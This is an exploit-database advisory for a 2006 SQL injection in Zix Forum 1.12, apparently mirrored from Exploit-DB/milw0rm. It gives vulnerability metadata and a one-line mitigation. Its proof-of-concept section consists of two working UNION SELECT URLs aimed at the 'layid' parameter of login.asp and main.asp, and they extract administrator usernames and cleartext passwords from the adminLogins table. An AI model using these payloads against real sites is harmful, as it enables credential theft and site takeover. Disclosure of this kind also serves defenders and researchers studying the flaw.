Zix Forum - exploit.company

vendor:

Zix Forum

by:

FarhadKey

7,5

CVSS

HIGH

SQL_Injection

CWE

Product Name: Zix Forum

Affected Version From: 1.12

Affected Version To: 1.12

Patch Exists: NO

Related CWE: N/A

CPE: a:zix_forum:zix_forum

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation extracts username and password of administrator in clear text.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability


Vulnerability:
--------------------
SQL_Injection:
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation extracts username and password of administrator in clear text .


Proof of Concepts:
--------------------
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By FarhadKey On 19 May 2006

# milw0rm.com [2006-05-19]